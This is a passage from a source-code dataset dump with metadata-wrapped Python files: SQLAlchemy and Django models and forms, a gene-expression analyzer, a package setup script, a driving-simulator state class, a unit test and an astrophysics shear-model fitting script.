Column(Integer)\n bx = Column(Integer)\n by = Column(Integer)\n\n def __init__(self, name=None, ax=None, ay=None, bx=None, by=None):\n self.name = name\n self.ax = ax\n self.ay = ay\n self.bx = bx\n self.by = by\n\n def __repr__(self):\n return \"\" % (self.id, self.name)\n", "sub_path": "models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1992, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "database.Base", "line_number": 8, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 10, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 11, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 12, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 13, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 13, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 14, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 15, "usage_type": "argument"}, {"api_name": "sqlalchemy.orm.validates", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.validates", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.validates", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.validates", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.validates", "line_number": 55, "usage_type": "call"}, {"api_name": "database.Base", "line_number": 63, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 65, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 66, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 66, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 68, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 68, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 69, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 69, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 70, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 70, "usage_type": "argument"}]} {"seq_id": "442221471", "text": "from typing import List, Dict\n\nfrom Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Analyzers.GlobalDifferentialAnalyzerBase import \\\n GlobalDifferentialAnalyzerBase\nfrom Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Measurers.GlobalRsemNormalizedCountMeasurer import \\\n GlobalRsemNormalizedCountMeasurer\nfrom Src.BioAnalyzer.CrossCutting.DTOs.GenePrioritization.GlobalDifferentialSampleDto import GlobalDifferentialSampleDto\nfrom Src.BioAnalyzer.Managers.GenePrioritization.GlobalDifferentialMessengerRnaSampleManager import \\\n 
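The `@validates` hooks in the `models.py` record run on attribute assignment, so out-of-range values are rejected at construction time. A stripped-down sketch of the pattern (one field, same 1-5 bound as the record; SQLAlchemy 1.4+ import style, and the error message is an addition):

```python
from sqlalchemy import Column, Integer
from sqlalchemy.orm import declarative_base, validates

Base = declarative_base()

class Property(Base):
    __tablename__ = "properties"
    id = Column(Integer, primary_key=True)
    beds = Column(Integer)

    @validates("beds")
    def validate_beds(self, key, value):
        if 1 <= int(value) <= 5:
            return value
        raise ValueError(f"{key} out of range: {value}")

Property(beds=3)       # passes validation
try:
    Property(beds=9)   # validator fires during __init__
except ValueError as e:
    print(e)
```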
GlobalDifferentialMessengerRnaSampleManager\nfrom Src.BioDataManagement.CrossCutting.DTOs.GeneExpressionLevelDto import GeneExpressionLevelDto\nfrom Src.Core.Entity.ProcessInfo import ProcessInfo\nfrom Src.Core.Entity.Status import Status\n\n\nclass GlobalMessengerRnaDifferentialAnalyzer(GlobalDifferentialAnalyzerBase[int, GeneExpressionLevelDto]):\n \"\"\"description of class\"\"\"\n def __init__(self):\n \"\"\"\n \"\"\"\n self.__manager = GlobalDifferentialMessengerRnaSampleManager()\n self.__measurer = GlobalRsemNormalizedCountMeasurer()\n\n def execute(self, values: Dict[int, List[GeneExpressionLevelDto]]) -> ProcessInfo:\n \"\"\"\n \n :param values: \n :return: \n \"\"\"\n diff_analysis_info = None\n\n try:\n diff_sample = GlobalDifferentialSampleDto(\n values=[self.__measurer.calculate(id_entrez,\n [l.case_value for l in levels],\n [l.control_value for l in levels])\n for id_entrez, levels in values.items()])\n\n except:\n diff_analysis_info = ProcessInfo(status=Status.Fail,\n message='Global differential analysis for messenger RNA samples has failed. See details to more information.',\n details=['{0}. {1}'.format(Status.Fail.name,\n 'Error in calculating the global differential analysis in the messenger RNA samples.')])\n\n if diff_analysis_info:\n return diff_analysis_info\n\n try:\n self.__manager.add_one(diff_sample)\n diff_analysis_info = ProcessInfo(status=Status.OK,\n message='Global differential analysis for messenger RNA samples has been successful. See details to more information.',\n details=['{0}. {1}'.format(Status.OK.name,\n 'Global differential analysis for messenger RNA samples has executed and saved in the system.')])\n\n except:\n diff_analysis_info = ProcessInfo(status=Status.Fail,\n message='Global differential analysis for messenger RNA samples has failed. See details to more information.',\n details=['{0}. 
{1}'.format(Status.Fail.name,\n 'Error in saving the global differential analysis for messenger RNA samples in the system.')])\n\n return diff_analysis_info", "sub_path": "Src/BioAnalyzer/Analysis/GenePrioritization/Steps/DifferentialAnalysis/Analyzers/GlobalMessengerRnaDifferentialAnalyzer.py", "file_name": "GlobalMessengerRnaDifferentialAnalyzer.py", "file_ext": "py", "file_size_in_byte": 3407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Analyzers.GlobalDifferentialAnalyzerBase.GlobalDifferentialAnalyzerBase", "line_number": 15, "usage_type": "name"}, {"api_name": "Src.BioDataManagement.CrossCutting.DTOs.GeneExpressionLevelDto.GeneExpressionLevelDto", "line_number": 15, "usage_type": "name"}, {"api_name": "Src.BioAnalyzer.Managers.GenePrioritization.GlobalDifferentialMessengerRnaSampleManager.GlobalDifferentialMessengerRnaSampleManager", "line_number": 20, "usage_type": "call"}, {"api_name": "Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Measurers.GlobalRsemNormalizedCountMeasurer.GlobalRsemNormalizedCountMeasurer", "line_number": 21, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "Src.BioDataManagement.CrossCutting.DTOs.GeneExpressionLevelDto.GeneExpressionLevelDto", "line_number": 23, "usage_type": "name"}, {"api_name": "Src.BioAnalyzer.CrossCutting.DTOs.GenePrioritization.GlobalDifferentialSampleDto.GlobalDifferentialSampleDto", "line_number": 32, "usage_type": "call"}, {"api_name": "Src.Core.Entity.ProcessInfo.ProcessInfo", "line_number": 39, "usage_type": "call"}, {"api_name": "Src.Core.Entity.Status.Status.Fail", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 39, "usage_type": "name"}, {"api_name": "Src.Core.Entity.Status.Status.Fail", "line_number": 41, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 41, "usage_type": "name"}, {"api_name": "Src.Core.Entity.ProcessInfo.ProcessInfo", "line_number": 49, "usage_type": "call"}, {"api_name": "Src.Core.Entity.Status.Status.OK", "line_number": 49, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 49, "usage_type": "name"}, {"api_name": "Src.Core.Entity.Status.Status.OK", "line_number": 51, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 51, "usage_type": "name"}, {"api_name": "Src.Core.Entity.ProcessInfo.ProcessInfo", "line_number": 55, "usage_type": "call"}, {"api_name": "Src.Core.Entity.Status.Status.Fail", "line_number": 55, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 55, "usage_type": "name"}, {"api_name": "Src.Core.Entity.Status.Status.Fail", "line_number": 57, "usage_type": "attribute"}, {"api_name": "Src.Core.Entity.Status.Status", "line_number": 57, "usage_type": "name"}, {"api_name": "Src.Core.Entity.ProcessInfo.ProcessInfo", "line_number": 23, "usage_type": "name"}]} {"seq_id": "421680653", "text": "\r\nfrom setuptools import setup, find_packages\r\n\r\nprint(find_packages())\r\nsource_packages = [\t\"vtandem\", \\\r\n\t\t\t\t\t\"vtandem.dft\", \\\r\n\t\t\t\t\t\"vtandem.visualization\", \\\r\n\t\t\t\t\t\"vtandem.visualization.quaternary\", 
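The differential analyzer above funnels every stage outcome through a `ProcessInfo(status, message, details)` value instead of letting exceptions propagate (though its bare `except:` clauses would be safer as `except Exception:`). A self-contained sketch of that status-wrapping pattern; the class bodies here are assumptions modeled on how the record uses them:

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import List

class Status(Enum):
    OK = "OK"
    Fail = "Fail"

@dataclass
class ProcessInfo:
    status: Status
    message: str
    details: List[str] = field(default_factory=list)

def run_stage(fn, stage_name):
    # Convert one pipeline stage's success/failure into a ProcessInfo.
    try:
        fn()
        return ProcessInfo(Status.OK, f"{stage_name} succeeded")
    except Exception as e:
        return ProcessInfo(Status.Fail, f"{stage_name} failed",
                           details=[f"{Status.Fail.name}. {e}"])

print(run_stage(lambda: 1 / 0, "global differential analysis"))
```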
\\\r\n\t\t\t\t\t\"vtandem.visualization.quaternary.quaternary_scripts\", \\\r\n\t\t\t\t\t\"vtandem.visualization.ternary\", \\\r\n\t\t\t\t\t\"vtandem.visualization.ternary.ternary_scripts\"\r\n\t\t\t\t\t]\r\nsource_image_files = [ \t(\"logo\", (\"logo/LogoLong.png\", \"logo/LogoSmall.png\")),\r\n\t\t\t\t\t\t(\"icon\", (\"icon/FolderBrowserIcon.png\", \"icon/QuestionIcon.png\"))\r\n\t\t\t\t\t\t]\r\n\r\nsetup(\r\n\tname = \"vtandem\",\r\n\tversion = \"2019.07.24\",\r\n\tdescription = \"\",\r\n\tauthor = \"Michael Y. Toriyama, Jiaxing Qu, Lidia C. Gomes, Elif Ertekin\",\r\n\tauthor_email = \"mathtoriyama@gmail.com\",\r\n\turl = \"\",\r\n\tpackages = source_packages,\r\n\tdata_files = source_image_files,\r\n\tpy_modules = [\"vtandem\"],\r\n\tentry_points = {\r\n\t\t\"console_scripts\": [\r\n\t\t\t\"vtandem = vtandem.vtandem:vtandem\"\r\n\t\t]\r\n\t},\r\n)\r\n\r\n\r\n\r\n\r\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 939, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "setuptools.find_packages", "line_number": 4, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 17, "usage_type": "call"}]} {"seq_id": "120028377", "text": "import gym\nfrom copy import deepcopy\nimport numpy as np\nfrom gym_urbandriving.assets import TrafficLight, Terrain, Street, Lane, Sidewalk, Car, CrosswalkLight, Pedestrian\nfrom gym_urbandriving.agents import *\nimport json\nimport os\nimport random\nimport six\n\nclass PositionState:\n \"\"\"\n Abstract class representing the objects in a scene\n \"\"\"\n\n def __init__(self, data, car_model=\"kinematic\"):\n self.dimensions = (1000, 1000)\n self.dynamic_objects = {}\n self.time = 0\n self.static_objects = []\n self.start_lanes = []\n self.goal_states = []\n self.agent_config = data['agents']\n self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions = [], [], []\n self.last_coll = -1\n\n if 'state' in data['environment']:\n state_config = data['environment']['state']\n basedir = os.path.dirname(__file__)\n state_config = json.load(open(os.path.join(basedir, \"configs/\", state_config + \".json\")))\n else:\n state_config = data['environment']['state_config']\n\n for obj_info in state_config['static_objects']:\n typ = {\"Terrain\":Terrain, \"Lane\":Lane, \"Street\":Street, \"Sidewalk\":Sidewalk}[obj_info.pop('type')]\n obj = typ(**obj_info)\n self.static_objects.append(obj)\n for obj_info in state_config['car_start_lanes']:\n self.start_lanes.append(Lane(**obj_info))\n\n self.state_config = state_config\n self.goal_states = state_config['goal_states']\n\n\n\n assert (car_model in {\"kinematic\", \"point\", \"reeds_shepp\"})\n self.car_model = car_model\n self.randomize()\n return\n\n def randomize(self):\n \"\"\"\n Randomly generates car and pedestrian positions\n \"\"\"\n self.dynamic_objects = {}\n self.dynamic_objects['controlled_cars'] = {}\n self.dynamic_objects['background_cars'] = {}\n self.dynamic_objects['pedestrians'] = {}\n self.dynamic_objects['traffic_lights'] = {}\n\n for car_index in range(self.agent_config['controlled_cars']):\n while True:\n start = np.random.random_integers(0, 3)\n lane = self.start_lanes[start]\n car = lane.generate_car(self.car_model)\n if not self.is_in_collision(car):\n self.dynamic_objects['controlled_cars'][str(car_index)] = car\n self.dynamic_objects['controlled_cars'][str(car_index)].destination = self.assign_goal_states(start)\n break\n\n for car_index in 
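The `entry_points` block in the vtandem `setup.py` asks setuptools to generate a `vtandem` console command that imports and calls `vtandem.vtandem:vtandem`. After `pip install .`, the generated wrapper is roughly equivalent to the following (a sketch; it only runs with the package installed):

```python
#!/usr/bin/env python
# Rough equivalent of the console_scripts wrapper setuptools generates
# for "vtandem = vtandem.vtandem:vtandem".
import sys
from vtandem.vtandem import vtandem

if __name__ == "__main__":
    sys.exit(vtandem())
```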
range(self.agent_config['background_cars']):\n            while True:\n                start = np.random.random_integers(0, 3)\n                lane = self.start_lanes[start]\n                car = lane.generate_car(self.car_model)\n                if not self.is_in_collision(car):\n                    self.dynamic_objects['background_cars'][str(car_index)] = car\n                    self.dynamic_objects['background_cars'][str(car_index)].destination = self.assign_goal_states(start)\n                    break\n\n        self.dynamic_objects['traffic_lights'] = {}\n        if self.agent_config['use_traffic_lights']:\n\n            for i, traffic_light in enumerate(self.state_config['traffic_lights']):\n                self.dynamic_objects['traffic_lights'][str(i)] = TrafficLight(**traffic_light)\n        self.dynamic_objects['crosswalk_lights'] = {}\n        self.dynamic_objects['pedestrians'] = {} \n        if self.agent_config['number_of_pedestrians']:\n            for i, crosswalk_light in enumerate(self.state_config['crosswalk_lights']):\n                self.dynamic_objects['crosswalk_lights'][str(i)] = CrosswalkLight(**crosswalk_light)\n\n        start_sidewalks = [s for s in self.static_objects if type(s) == Sidewalk]\n\n        for ped_index in range(self.agent_config['number_of_pedestrians']):\n            while True:\n                start = np.random.random_integers(0, len(start_sidewalks) - 1)\n                sidewalk = start_sidewalks[start]\n                ped = sidewalk.generate_man()\n                if not self.is_in_collision(ped):\n                    self.dynamic_objects['pedestrians'][str(ped_index)] = ped\n                    break\n        #TODO Add pedestrians\n\n        self.create_agents()\n\n    def assign_goal_states(self, start_lane):\n        \"\"\"\n        Assigns a random goal state to a car\n        \"\"\"\n        goal_choices = deepcopy(self.goal_states)\n        del goal_choices[start_lane]\n        choice = random.choice(goal_choices)\n\n        return [choice['x'], choice['y'], choice['vel'], np.deg2rad(choice['angle_deg'])]\n\n    def create_agents(self):\n        \"\"\"\n        Creates agents for objects in the scene\n        \"\"\"\n        agent_mappings = {}\n        for k, v in six.iteritems(self.agent_config['agent_mappings']):\n            agent_mappings[{\"Car\":Car,\n                            \"TrafficLight\":TrafficLight,\n                            \"CrosswalkLight\":CrosswalkLight,\n                            \"Pedestrian\":Pedestrian}[k]] = {\"PlanningPursuitAgent\":PlanningPursuitAgent,\n                                                            \"TrafficLightAgent\":TrafficLightAgent,\n                                                            \"CrosswalkLightAgent\":CrosswalkLightAgent,\n                                                            \"Agent\": Agent,\n                                                            \"PedestrianAgent\":PedestrianAgent,\n                                                            \"NeuralPursuitAgent\":lambda i:NeuralPursuitAgent(i,\n                                                                                                             noise=self.agent_config['bg_state_space_config']['noise'],\n                                                                                                             omission_prob=self.agent_config['bg_state_space_config']['omission_prob'])}[v]\n\n        self.bg_agents = {}\n        for key in self.dynamic_objects.keys():\n            if not key == 'controlled_cars':\n                self.bg_agents[key] = []\n                for i, index in enumerate(self.dynamic_objects[key]):\n                    obj = self.dynamic_objects[key][index]\n                    if type(obj) in agent_mappings:\n                        self.bg_agents[key].append(agent_mappings[type(obj)](i))\n        self.bg_agents['controlled_cars'] = []\n        for i in range(self.agent_config['controlled_cars']):\n            action_space = self.agent_config['action_space']\n            agent = {'steering':SteeringActionAgent,\n                     'velocity':VelocityActionAgent,\n                     'trajectory':TrajectoryActionAgent}[action_space](i)\n            self.bg_agents['controlled_cars'].append(agent)\n\n    def is_in_collision(self,car):\n\n        for obj in self.static_objects:\n            if car.collides(obj):\n                return True\n        for key in self.dynamic_objects.keys():\n            for i,obj in six.iteritems(self.dynamic_objects[key]):\n                if car.collides(obj):\n                    return True\n        return False\n\n\n    def get_collisions(self):\n        \"\"\"\n        Get list of all collisions in this state\n\n        Returns\n        -------\n        list\n            List of tuples, where each tuple contains a pair of colliding object indices. 
Dynamic_collisions contains collisions between cars and other cars.\n        list\n            The corresponding list for collisions between dynamic objects and static objects\n        \"\"\"\n        if self.last_coll == self.time:\n            return self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions\n        self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions = [], [], []\n        self.last_coll = self.time\n\n        #TODO Fix this. Controlled cars can't collide with background cars\n        for key in self.dynamic_objects.keys():\n            for i, dobj in self.dynamic_objects[key].items():\n                i = int(i)\n\n                for j, sobj in enumerate(self.static_objects):\n                    if dobj.collides(sobj):\n                        self.static_collisions.append([i, j, key, 'static'])\n\n                for inner_key in self.dynamic_objects.keys():\n                    for j, dobj1 in self.dynamic_objects[inner_key].items():\n                        j = int(j)\n                        if (not (i == j and key == inner_key)) and dobj.collides(dobj1):\n                            self.dynamic_collisions.append([i, j,key, inner_key])\n                            if key == 'controlled_cars':\n                                self.controlled_car_collisions.append([i, j,key, inner_key])\n\n        return self.dynamic_collisions, self.static_collisions, self.controlled_car_collisions\n\n\n    def collides_any(self, agentnum,type_of_agent = 'background_cars'):\n        \"\"\"\n        Returns if the agentnum object in the scene is colliding with any other object\n\n        Parameters\n        ----------\n        agentnum : int\n            The index of the object to query\n\n        Returns\n        -------\n        bool\n            True if this object is colliding\n        \"\"\"\n\n        dynamic_collisions, static_collisions, _ = self.get_collisions()\n        for coll in dynamic_collisions:\n            id1, id2, t1, t2 = coll\n            if (agentnum, type_of_agent) in [(id1, t1), (id2, t2)]:\n                return True\n        for coll in static_collisions:\n            id1, id2, t1, t2 = coll\n            if (agentnum, type_of_agent) == (id1, t1):\n                return True\n        return False\n\n    def collides_any_dynamic(self, agentnum,type_of_agent = 'background_cars'):\n        dynamic_collisions, static_collisions, _ = self.get_collisions()\n\n        for coll in dynamic_collisions:\n            id1, id2, t1, t2 = coll\n            if (agentnum, type_of_agent) in [(id1, t1), (id2, t2)]:\n                return True\n\n        return False\n\n    def min_dist_to_coll(self, agentnum,type_of_agent = 'background_cars'):\n        \"\"\"\n        Returns the minimum distance between the object with id agentnum and a collideable object.\n\n        Parameters\n        ----------\n        agentnum : int\n            The index of the object to query\n\n        Returns\n        -------\n        float\n            Distance to nearest collideable object\n        \"\"\"\n        min_dist = np.finfo('f').max\n        obj = self.dynamic_objects[type_of_agent][agentnum]\n        for j, sobj in enumerate(self.static_objects):\n            if obj.can_collide(sobj):\n                min_dist = min(min_dist, obj.dist_to(sobj))\n\n        for key in self.dynamic_objects.keys():\n            for j, dobj in self.dynamic_objects[key].items():\n                if (int(j) != agentnum or key != type_of_agent) and obj.can_collide(dobj):\n                    min_dist = min(min_dist, obj.dist_to(dobj))\n        return min_dist\n\n    def get_observations(self, observation_type):\n        \"\"\"\n        Stub: intended to return the observations of the requested type for\n        this state; not implemented in this version.\n\n        Parameters\n        ----------\n        observation_type : str\n            The type of observation to generate\n        \"\"\"\n", "sub_path": "gym_urbandriving/state/state.py", "file_name": "state.py", "file_ext": "py", "file_size_in_byte": 11222, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 30, "usage_type": "call"}, {"api_name": 
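The original `collides_any` compared tuples with `is`, which tests object identity rather than equality and is generally `False` for tuples built at runtime, so static collisions were never reported (corrected to `==` above). The pitfall in miniature:

```python
x = 3
a = (x, "background_cars")
b = (x, "background_cars")
print(a == b)  # True:  element-wise equality
print(a is b)  # False: two distinct tuple objects, identity differs
```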
"os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "gym_urbandriving.assets.Terrain", "line_number": 35, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.Lane", "line_number": 35, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.Street", "line_number": 35, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.Sidewalk", "line_number": 35, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.Lane", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.random_integers", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 73, "usage_type": "attribute"}, {"api_name": "gym_urbandriving.assets.TrafficLight", "line_number": 85, "usage_type": "call"}, {"api_name": "gym_urbandriving.assets.CrosswalkLight", "line_number": 90, "usage_type": "call"}, {"api_name": "gym_urbandriving.assets.Sidewalk", "line_number": 92, "usage_type": "name"}, {"api_name": "numpy.random.random_integers", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 96, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 110, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 114, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 121, "usage_type": "call"}, {"api_name": "gym_urbandriving.assets.Car", "line_number": 122, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.TrafficLight", "line_number": 123, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.CrosswalkLight", "line_number": 124, "usage_type": "name"}, {"api_name": "gym_urbandriving.assets.Pedestrian", "line_number": 125, "usage_type": "name"}, {"api_name": "six.iteritems", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.finfo", "line_number": 248, "usage_type": "call"}]} {"seq_id": "551269621", "text": "#!/usr/bin/env python\n\"\"\" \"\"\"\n\n# Standard library modules.\nimport unittest\nimport logging\n\n# Third party modules.\n\n# Local modules.\nfrom pyhmsa_gui.util.human import camelcase_to_words\n\n# Globals and constants variables.\n\nclass TestModule(unittest.TestCase):\n\n def setUp(self):\n unittest.TestCase.setUp(self)\n\n def tearDown(self):\n unittest.TestCase.tearDown(self)\n\n def testcamelcase_to_words(self):\n text = 'JohnDoe'\n actual = camelcase_to_words(text)\n expected = ('John', 'Doe')\n self.assertEqual(expected, actual)\n\n text = 'JohnDoeAndJaneDoe'\n actual = camelcase_to_words(text)\n expected = ('John', 'Doe', 'And', 'Jane', 'Doe')\n self.assertEqual(expected, actual)\n\n text = 'John'\n actual = camelcase_to_words(text)\n expected = ('John',)\n self.assertEqual(expected, actual)\n\nif __name__ == '__main__': #pragma: no cover\n logging.getLogger().setLevel(logging.DEBUG)\n unittest.main()\n", "sub_path": "pyhmsa_gui/util/test_human.py", "file_name": "test_human.py", "file_ext": "py", "file_size_in_byte": 998, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "unittest.TestCase", "line_number": 15, "usage_type": "attribute"}, {"api_name": "unittest.TestCase.setUp", "line_number": 18, "usage_type": "call"}, {"api_name": "unittest.TestCase", 
"line_number": 18, "usage_type": "attribute"}, {"api_name": "unittest.TestCase.tearDown", "line_number": 21, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pyhmsa_gui.util.human.camelcase_to_words", "line_number": 25, "usage_type": "call"}, {"api_name": "pyhmsa_gui.util.human.camelcase_to_words", "line_number": 30, "usage_type": "call"}, {"api_name": "pyhmsa_gui.util.human.camelcase_to_words", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 40, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 41, "usage_type": "call"}]} {"seq_id": "432266898", "text": "# coding=utf-8\nfrom django import forms\nfrom django_summernote.widgets import SummernoteWidget\nfrom .models import Article\n\n\nclass ArticleForm(forms.ModelForm):\n class Meta:\n model = Article\n fields = [\n \"title\",\n \"image\",\n \"content\",\n \"draft\",\n \"publish\",\n ]\n widgets = {\n \"content\": SummernoteWidget(),\n }\n\n\nclass SearchForm(forms.Form):\n q = forms.CharField(max_length=100, label='Búsqueda')\n", "sub_path": "articles/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 503, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.forms.ModelForm", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "models.Article", "line_number": 9, "usage_type": "name"}, {"api_name": "django_summernote.widgets.SummernoteWidget", "line_number": 18, "usage_type": "call"}, {"api_name": "django.forms.Form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 23, "usage_type": "name"}]} {"seq_id": "449882717", "text": "#!/usr/bin/env python\n#######################\n# Run a ML pdz fit for an nfw model\n########################\n\nimport numpy as np\nimport sys, ldac, astropy, astropy.io.fits as pyfits, cPickle\nimport shearprofile as sp\nimport nfwmodel\n\n\n\n##########################\n\ninputCatFile = sys.argv[1]\ninputPDZ = sys.argv[2]\nshapedistro_module = sys.argv[3]\noutputFile = sys.argv[4]\n\n##########################\n\ninputcat = ldac.openObjectFile(inputCatFile)\n\nconcentration = inputcat.hdu.header['CONCEN']\nzcluster = inputcat.hdu.header['Z']\n\n\nD_lens = sp.angulardist(zcluster)\npixscale = 0.2\nminPix = 0.3 * 3600. * (180./np.pi) / ( pixscale * D_lens )\nmaxPix = 5. * 3600. 
* (180./np.pi) / ( pixscale * D_lens )\n\ngoodObjs = np.logical_and(np.logical_and(inputcat['r_pix'] > minPix, \n inputcat['r_pix'] < maxPix),\n np.logical_and(inputcat['z_b'] > 0,\n inputcat['z_b'] < 1.25))\n\n\nshapedistro = __import__(shapedistro_module)\n\nbin_selectors = [np.logical_and(goodObjs, selector) \\\n for selector in shapedistro.bin_selectors(inputcat)]\n\n\npdzfile = open(inputPDZ, 'rb')\npdzrange, pdz = cPickle.load(pdzfile)\npdzrange = pdzrange.astype(np.float64)\npdz = pdz.astype(np.float64)\n\n\nbetas = sp.beta_s(pdzrange, zcluster)\n\nrs = np.arange(0.01, 1.0, 0.0005)\n\nrs, scan = nfwmodel.scan_model(rs, \n [inputcat['r_mpc'][x].astype(np.float64) for x in bin_selectors],\n [inputcat['ghats'][x].astype(np.float64) for x in bin_selectors],\n betas,\n [pdz[x] for x in bin_selectors],\n concentration,\n zcluster,\n shapedistro.likelihood_func,\n shapedistro.samples)\n\n\n\n\ncols = [ pyfits.Column(name = 'Rs', format = 'E', array = rs),\n pyfits.Column(name = 'prob', format = 'E', array = scan)]\ncat = pyfits.BinTableHDU.from_columns(cols)\ncat.header['EXTNAME']= 'OBJECTS'\n\ncat.writeto(outputFile, overwrite=True)\n", "sub_path": "nfwmodel_binned_batchrunner.py", "file_name": "nfwmodel_binned_batchrunner.py", "file_ext": "py", "file_size_in_byte": 2140, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.argv", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "ldac.openObjectFile", "line_number": 22, "usage_type": "call"}, {"api_name": "shearprofile.angulardist", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.logical_and", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 41, "usage_type": "call"}, {"api_name": "cPickle.load", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 48, "usage_type": "attribute"}, {"api_name": "shearprofile.beta_s", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 53, "usage_type": "call"}, {"api_name": "nfwmodel.scan_model", "line_number": 55, "usage_type": 